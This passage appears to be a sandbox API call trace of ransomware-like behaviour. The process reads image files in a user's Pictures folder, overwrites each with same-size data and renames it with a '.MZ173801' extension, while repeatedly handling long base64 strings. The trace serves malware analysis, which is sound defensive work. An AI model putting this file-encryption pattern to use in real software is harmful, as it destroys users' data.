5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.041] GetCurrentThreadId () returned 0x1358 [0116.041] GetCurrentThreadId () returned 0x1358 [0116.041] GetCurrentThreadId () returned 0x1358 [0116.041] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\IZVvQMMfV6LuTAy.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\izvvqmmfv6lutay.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.041] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0116.041] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.041] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0xd774 [0116.041] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.041] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xd774, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0xd774, lpOverlapped=0x0) returned 1 [0116.042] CloseHandle (hObject=0x3d0) returned 1 [0116.050] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\IZVvQMMfV6LuTAy.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\izvvqmmfv6lutay.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.051] WriteFile (in: hFile=0x3d0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0xd774, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f6f0*=0xd774, lpOverlapped=0x0) returned 1 [0116.067] CloseHandle (hObject=0x3d0) returned 1 [0116.069] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\IZVvQMMfV6LuTAy.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\izvvqmmfv6lutay.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\IZVvQMMfV6LuTAy.bmp.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\izvvqmmfv6lutay.bmp.mz173801")) returned 1 [0116.070] GetCurrentThreadId () returned 0x1358 [0116.070] GetCurrentThreadId () returned 0x1358 [0116.070] GetCurrentThreadId () returned 0x1358 [0116.070] GetCurrentThreadId () returned 0x1358 [0116.070] GetCurrentThreadId () returned 0x1358 [0116.070] GetCurrentThreadId () returned 0x1358 [0116.070] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x609fcb60, ftCreationTime.dwHighDateTime=0x1d5f007, ftLastAccessTime.dwLowDateTime=0x690ef7d0, ftLastAccessTime.dwHighDateTime=0x1d5e274, ftLastWriteTime.dwLowDateTime=0x690ef7d0, ftLastWriteTime.dwHighDateTime=0x1d5e274, nFileSizeHigh=0x0, nFileSizeLow=0xc56a, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="jt9dNiGSkN.gif", cAlternateFileName="JT9DNI~1.GIF")) returned 1 [0116.070] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.070] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.070] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\jt9dNiGSkN.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\jt9dnigskn.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x609fcb60, ftCreationTime.dwHighDateTime=0x1d5f007, ftLastAccessTime.dwLowDateTime=0x690ef7d0, ftLastAccessTime.dwHighDateTime=0x1d5e274, ftLastWriteTime.dwLowDateTime=0x690ef7d0, ftLastWriteTime.dwHighDateTime=0x1d5e274, nFileSizeHigh=0x0, nFileSizeLow=0xc56a)) returned 1 [0116.071] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.071] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.071] GetCurrentThreadId () returned 0x1358 [0116.071] GetCurrentThreadId () returned 0x1358 [0116.071] GetCurrentThreadId () returned 0x1358 [0116.072] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.072] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.072] GetCurrentThreadId () returned 0x1358 [0116.072] GetCurrentThreadId () returned 0x1358 [0116.072] GetCurrentThreadId () returned 0x1358 [0116.072] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\jt9dNiGSkN.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\jt9dnigskn.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.072] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0116.072] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.072] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0xc56a [0116.072] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.072] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xc56a, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0xc56a, lpOverlapped=0x0) returned 1 [0116.073] CloseHandle (hObject=0x3d0) returned 1 [0116.074] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\jt9dNiGSkN.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\jt9dnigskn.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.075] WriteFile (in: hFile=0x3d0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0xc56a, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f6f0*=0xc56a, lpOverlapped=0x0) returned 1 [0116.077] CloseHandle (hObject=0x3d0) returned 1 [0116.079] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\jt9dNiGSkN.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\jt9dnigskn.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\jt9dNiGSkN.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\jt9dnigskn.gif.mz173801")) returned 1 [0116.079] GetCurrentThreadId () returned 0x1358 [0116.079] GetCurrentThreadId () returned 0x1358 [0116.079] GetCurrentThreadId () returned 0x1358 [0116.079] GetCurrentThreadId () returned 0x1358 [0116.079] GetCurrentThreadId () returned 0x1358 [0116.079] GetCurrentThreadId () returned 0x1358 [0116.079] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54aa9310, ftCreationTime.dwHighDateTime=0x1d5ee10, ftLastAccessTime.dwLowDateTime=0xe9955bb0, ftLastAccessTime.dwHighDateTime=0x1d5e3f5, ftLastWriteTime.dwLowDateTime=0xe9955bb0, ftLastWriteTime.dwHighDateTime=0x1d5e3f5, nFileSizeHigh=0x0, nFileSizeLow=0xf700, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="s1HnMB.png", cAlternateFileName="")) returned 1 [0116.079] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.079] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.079] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\s1HnMB.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\s1hnmb.png"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54aa9310, ftCreationTime.dwHighDateTime=0x1d5ee10, ftLastAccessTime.dwLowDateTime=0xe9955bb0, ftLastAccessTime.dwHighDateTime=0x1d5e3f5, ftLastWriteTime.dwLowDateTime=0xe9955bb0, ftLastWriteTime.dwHighDateTime=0x1d5e3f5, nFileSizeHigh=0x0, nFileSizeLow=0xf700)) returned 1 [0116.080] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.080] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.080] GetCurrentThreadId () returned 0x1358 [0116.080] GetCurrentThreadId () returned 0x1358 [0116.080] GetCurrentThreadId () returned 0x1358 [0116.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 